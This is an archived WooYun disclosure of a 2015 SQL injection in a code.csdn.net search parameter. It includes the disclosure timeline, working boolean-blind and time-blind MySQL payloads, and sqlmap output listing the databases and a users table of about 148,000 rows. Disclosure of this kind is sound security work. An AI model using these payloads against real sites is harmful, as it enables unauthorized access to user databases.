WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, browse online--------http://drop.zone.ci/
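2015-10-13: Details reported to the vendor; awaiting vendor handling
2015-10-13: Vendor confirmed; details disclosed to the vendor only
2015-10-23: Details disclosed to core white hats and experts in related fields
2015-11-02: Details disclosed to regular white hats
2015-11-12: Details disclosed to intern white hats
2015-11-27: Details disclosed to the public
Checking in.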
code.csdn.net/openyp/search_open_figure?key=1&utf8=%e2%9c%93
---
Parameter: sort (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: direction=desc&sort=1 RLIKE (SELECT (CASE WHEN (1113=1113) THEN 1 ELSE 0x28 END))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: direction=desc&sort=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GANI)
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] `code\x04`
[*] information_schema
[*] mysql

Database: code
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 148615  |
+-------+---------+

Database: code
[147 tables]
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-13 22:57
Will fix as soon as possible.
None yet